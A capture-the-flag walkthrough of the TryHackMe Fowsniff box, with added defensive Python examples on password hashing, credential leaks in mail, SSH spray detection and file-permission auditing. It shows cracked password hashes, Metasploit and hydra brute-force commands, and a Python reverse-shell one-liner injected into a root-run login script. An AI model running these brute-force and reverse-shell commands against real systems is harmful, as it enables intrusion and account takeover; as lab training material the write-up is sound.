THM-Fowsniff CTF

This post was last updated on the evening of 21 January 2025.

I've been a bit lazy lately owo

Information gathering

nmap

First, scan the target with nmap:

```bash
nmap -T4 --min-rate 1000 -sC -sV -p- 10.10.108.176
```

Four ports are open: 22, 80, 110 and 143.

Visiting the website reveals a company called Fowsniff Corp. Scrolling down, there is a notice saying roughly that the @fowsniffcorp Twitter account has been hijacked and may contain sensitive information, so let's go and search for it.

A Google search turned up the Twitter post by its description; opening it shows the following, including a link.

Following the link shows that the page has already been taken down, so I could only read the information from the WP (writeup).

The information is as follows:

```text
FOWSNIFF CORP PASSWORD LEAK
''~``
( o o )
+-----.oooO--(_)--Oooo.------+
| |
| FOWSNIFF |
| got |
| PWN3D!!! |
| |
| .oooO |
| ( ) Oooo. |
+---------\ (----( )-------+
\_) ) /
(_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!


mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

l8r n00bz!

B1gN1nj4

-------------------------------------------------------------------------------------------------
This list is entirely fictional and is part of a Capture the Flag educational challenge.

All information contained within is invented solely for this purpose and does not correspond
to any real persons or organizations.

Any similarities to actual people or entities is purely coincidental and occurred accidentally.
```

From the information above we can see that email addresses and password hashes were leaked:

```text
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
```

The passwords were recovered with https://hashes.com/en/decrypt/hash:

```text
8a28a94a588a95b80163709ab4313aa4:mailcall
ae1644dac5b77c0cf51e0d26ad6d7e56:bilbo101
1dc352435fecca338acfd4be10984009:apples01
19f5af754c31f1e2651edde9250d69bb:skyler22
90dc16d47114aa13671c697fd506cf26:scoobydoo2
a92b8a29ef1183192e3d35187e0cfabd:(not found)
0e9588cb62f4b6f27e33d449e2ba0b3b:carp4ever
4d6e42f56e127803285a0a7649b5ab11:orlando12
f7fd98d380735e859f8b2ffbbede5a7e:07011972
```
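The reason an online lookup could recover eight of the nine passwords is that the dump is unsalted MD5: one precomputed table serves every account at once. The example below is added here and is not code from the post or from hashes.com. It reproduces that lookup offline against the posted hashes using a small candidate list, then shows the salted, iterated PBKDF2 storage that makes a shared table useless. The candidate list and the iteration count are assumptions of the example.

```python
import hashlib
import hmac
import os

# Leaked "account:md5hex" lines, copied from the dump in the post.
LEAK = """\
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
"""

# Constructed stand-in for a wordlist: the plaintexts the post recovered plus two filler words.
CANDIDATES = ["password", "fowsniff", "mailcall", "bilbo101", "apples01", "skyler22",
              "scoobydoo2", "carp4ever", "orlando12", "07011972"]

HEX = set("0123456789abcdef")


def parse_leak(text):
    """Parse dump lines into {account: md5hex}, skipping anything that is not a 32-hex digest."""
    entries = {}
    for line in text.splitlines():
        if ":" not in line:
            continue
        account, digest = line.strip().split(":", 1)
        digest = digest.lower()
        if len(digest) == 32 and set(digest) <= HEX:
            entries[account] = digest
    return entries


def crack_unsalted_md5(entries, candidates):
    """One MD5 per candidate builds a table that is reused for every account.
    The work does not grow with the number of users, which is why unsalted MD5 fails here."""
    table = {hashlib.md5(c.encode()).hexdigest(): c for c in candidates}
    return {acct: table[h] for acct, h in entries.items() if h in table}


def verify_crack(entries, cracked):
    """Sanity check: every recovered plaintext really hashes to the leaked digest."""
    return all(hashlib.md5(p.encode()).hexdigest() == entries[a] for a, p in cracked.items())


def store_password(password, iterations=200_000):
    """Salted, iterated PBKDF2-HMAC-SHA256: a per-user random salt defeats a shared table."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "dk": dk, "iterations": iterations}


def verify_password(password, record):
    """Constant-time comparison of a fresh derivation against the stored key."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(dk, record["dk"])


def guesses_needed(n_accounts, n_candidates, salted):
    """Hash evaluations needed to try every candidate against every account."""
    return n_accounts * n_candidates if salted else n_candidates


if __name__ == "__main__":
    entries = parse_leak(LEAK)
    cracked = crack_unsalted_md5(entries, CANDIDATES)
    for acct in entries:
        print(f"{acct}: {cracked.get(acct, '<not in candidate list>')}")
    print("MD5 evaluations for all accounts:", guesses_needed(len(entries), len(CANDIDATES), False))
    print("PBKDF2 evaluations with per-user salt:", guesses_needed(len(entries), len(CANDIDATES), True))
```

With unsalted MD5 the attacker hashes each candidate once; with per-user salts the same attack costs candidates times accounts times iterations, which is the whole point of a password KDF.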

Login

Metasploit & hydra

Now that we have usernames and passwords, we can use Metasploit's pop3_login module to brute-force POP3 with the information found above.

Put the usernames and passwords into usernames.txt and passwords.txt respectively:

```bash
use auxiliary/scanner/pop3/pop3_login
set rhost 10.10.253.104   # I had to go out partway through, so this is the re-deployed machine's new IP
set user_file /home/butt3rf1y/usernames.txt
set pass_file /home/butt3rf1y/passwords.txt
run
```

The brute force found 1 valid account: seina:scoobydoo2 (msf is so slow, ugh :(

Log in to the mailbox and take a look:

```bash
nc 10.10.253.104 110
```

list shows two emails; let's read them. retr 1 reads the first one:

```text
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone
```

retr 2 reads the second one:

```text
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.
```

Putting it together, the first email contains the line "The temporary password for SSH is "S1ck3nBluff+secureshell"", a temporary password.

It also has a long recipient list: "baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff, mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff, tegel@fowsniff". Create an sshusers.txt file from it and use hydra to confirm which users have not changed their password:
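The two things this mailbox gives away, a plaintext SSH password in a message body and a complete recipient list in the headers, are exactly what a mail-side control should surface before an attacker does. The example below is added here and is not code from the post. It parses the first message with Python's standard email module, extracts sender and recipients, and flags lines that share a credential, redacting the secret in the report. The message text is copied from the post with the folded header lines re-indented with a leading space as RFC 5322 requires; the credential patterns are an assumption of the example.

```python
import email
import re
from email.utils import getaddresses, parseaddr

# First message retrieved over POP3, copied from the post (body shortened).
# Folded header lines are indented with a space so a standards-conforming parser sees one header.
RAW_MAIL = """\
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
 id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
 mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
 tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Thanks,
A.J Stone
"""

# Assumed patterns for credentials shared in prose: `password ... is "secret"` and `password: secret`.
CRED_PATTERNS = [
    re.compile(r'\b(?:password|passwd|passphrase)\b[^"\n]{0,40}"([^"]+)"', re.I),
    re.compile(r'\b(?:password|passwd|pwd)\s*[:=]\s*(\S+)', re.I),
]


def recipients(raw):
    """All addresses in To/Cc, lower-cased, with RFC 5322 folding and comments handled by stdlib."""
    msg = email.message_from_string(raw)
    pairs = getaddresses(msg.get_all("To", []) + msg.get_all("Cc", []))
    return {addr.lower() for _, addr in pairs if addr}


def sender(raw):
    """Bare sender address; parseaddr strips the '(stone)' comment form used on this server."""
    msg = email.message_from_string(raw)
    return parseaddr(msg.get("From", ""))[1].lower()


def find_credential_lines(raw):
    """Return (body line number, redacted line) for every line matching a credential pattern."""
    msg = email.message_from_string(raw)
    body = msg.get_payload()  # single-part message, so this is the text body
    hits = []
    for no, line in enumerate(body.splitlines(), 1):
        for pat in CRED_PATTERNS:
            m = pat.search(line)
            if m:
                hits.append((no, line[:m.start(1)] + "[REDACTED]" + line[m.end(1):]))
                break
    return hits


if __name__ == "__main__":
    print("from:", sender(RAW_MAIL))
    print("to:", sorted(recipients(RAW_MAIL)))
    for no, line in find_credential_lines(RAW_MAIL):
        print(f"credential shared on body line {no}: {line}")
```

Redacting in the report matters: an alert that copies the secret into a SIEM or ticket just creates another place it leaks from.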

```bash
hydra -L sshusers.txt -p S1ck3nBluff+secureshell ssh://10.10.253.104
```

This confirms that user baksteen has not changed the password, so we can now connect directly over ssh:
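Seen from the server, the hydra run above leaves a distinctive trace in sshd's log: one source address failing against many different usernames within seconds, then a single success. The example below is added here and is not code from the post. It runs that password-spray detection over constructed auth.log lines; the line format follows the usual sshd "Failed/Accepted password for ... from ... port ..." messages, and the 60-second window, five-user threshold and log year are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log excerpt: one password tried against many users from one address,
# followed by a success, plus an unrelated single failure from a second address.
SAMPLE_LOG = """\
Jan 21 21:00:01 fowsniff sshd[1201]: Failed password for mauer from 10.14.96.245 port 40001 ssh2
Jan 21 21:00:02 fowsniff sshd[1202]: Failed password for mustikka from 10.14.96.245 port 40002 ssh2
Jan 21 21:00:03 fowsniff sshd[1203]: Failed password for tegel from 10.14.96.245 port 40003 ssh2
Jan 21 21:00:04 fowsniff sshd[1204]: Failed password for seina from 10.14.96.245 port 40004 ssh2
Jan 21 21:00:05 fowsniff sshd[1205]: Failed password for stone from 10.14.96.245 port 40005 ssh2
Jan 21 21:00:06 fowsniff sshd[1206]: Failed password for mursten from 10.14.96.245 port 40006 ssh2
Jan 21 21:00:07 fowsniff sshd[1207]: Failed password for invalid user admin from 10.14.96.245 port 40007 ssh2
Jan 21 21:00:08 fowsniff sshd[1208]: Accepted password for baksteen from 10.14.96.245 port 40008 ssh2
Jan 21 21:03:00 fowsniff sshd[1300]: Failed password for seina from 10.10.0.5 port 51000 ssh2
Jan 21 21:05:00 fowsniff sshd[1301]: Accepted password for seina from 10.10.0.5 port 51001 ssh2
""".splitlines()

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s\d\d:\d\d:\d\d)\s\S+\ssshd\[\d+\]:\s"
    r"(?P<result>Failed|Accepted)\spassword\sfor\s(?:invalid\suser\s)?"
    r"(?P<user>\S+)\sfrom\s(?P<ip>\S+)\sport\s\d+"
)


def parse_auth_log(lines, year=2025):
    """Turn sshd lines into (timestamp, ip, user, success) tuples, sorted by time.
    Syslog timestamps carry no year, so one is assumed."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["result"] == "Accepted"))
    events.sort()
    return events


def detect_spray(events, window_seconds=60, min_users=5):
    """Flag a source that fails against >= min_users distinct accounts inside a sliding window,
    and flag any later successful login from a source that was already flagged."""
    alerts = []
    recent = defaultdict(deque)  # ip -> recent failures as (timestamp, user)
    flagged = set()
    for ts, ip, user, success in events:
        if success:
            if ip in flagged:
                alerts.append(("success_after_spray", ip, user))
            continue
        q = recent[ip]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        users = {u for _, u in q}
        if len(users) >= min_users and ip not in flagged:
            flagged.add(ip)
            alerts.append(("password_spray", ip, sorted(users)))
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_auth_log(SAMPLE_LOG)):
        print(alert)
```

A valid login immediately after a spray is the higher-fidelity signal of the two: it means the temporary password was never rotated, which is exactly what the emails warned about.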

```bash
ssh baksteen@10.10.253.104
```

After connecting, we find that baksteen belongs to the users group, so list the files that group owns:

```bash
find / -type f -group users 2>/dev/null
```

Among them is a shell script, /opt/cube/cube.sh. Looking at it, it is just the picture displayed at login, but it is writable by our group, which means we can write a reverse shell into it.
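The root cause here is a script executed at login that a low-privileged group can modify. The example below is added here and is not code from the post. It audits a list of paths for group- or world-writable mode bits (and for a writable, non-sticky parent directory, which lets the file be replaced outright), then strips the write bits. It demonstrates on a constructed copy of the layout in a temporary directory rather than on /opt/cube/cube.sh itself; the 0664 mode is the assumption that matches what the post describes.

```python
import os
import stat
import tempfile


def writable_by_others(path):
    """List the ways a file could be modified by someone other than its owner (or root)."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return ["symlink"]  # the link target can be swapped; inspect it separately
    reasons = []
    if st.st_mode & stat.S_IWGRP:
        reasons.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    parent = os.path.dirname(os.path.abspath(path))
    pmode = os.stat(parent).st_mode
    if pmode & (stat.S_IWGRP | stat.S_IWOTH) and not pmode & stat.S_ISVTX:
        reasons.append("parent-dir-writable")  # file can be renamed/replaced even if its own mode is tight
    return reasons


def audit(paths):
    """Map each existing path to its list of findings (empty list means nothing found)."""
    return {p: writable_by_others(p) for p in paths if os.path.lexists(p)}


def remediate(path):
    """Strip group/world write bits and return the re-audit. Ownership (chown to root) is left to the admin."""
    st = os.stat(path)
    os.chmod(path, st.st_mode & ~(stat.S_IWGRP | stat.S_IWOTH))
    return writable_by_others(path)


def demo():
    """Constructed /opt/cube-style layout in a temp dir: audit before and after the fix."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o755)
        weak = os.path.join(d, "cube.sh")   # stands in for the group-writable login script
        ok = os.path.join(d, "motd.sh")     # same content, sane permissions
        for p in (weak, ok):
            with open(p, "w") as f:
                f.write("#!/bin/sh\necho 'login banner'\n")
        os.chmod(weak, 0o664)
        os.chmod(ok, 0o644)
        before = {os.path.basename(p): r for p, r in audit([weak, ok]).items()}
        after = {"cube.sh": remediate(weak)}
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", before)
    print("after: ", after)
```

On a real host the list to audit is whatever login, cron, or service-manager hooks run as root: anything there that a non-root group can write is a privilege escalation waiting to happen, regardless of what the script currently contains.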

Reverse shell

Write the following into the /opt/cube/cube.sh script and save it:

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.96.245",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

Log out and log back in, with nc listening on the port the shell connects back to (I'm using WSL, so I listened with Windows ncat directly).

The connection came back with a shell running as root.

Got the flag.

Author: butt3rf1y
Published 21 January 2025
http://example.com/2025/01/21/Fowsniff/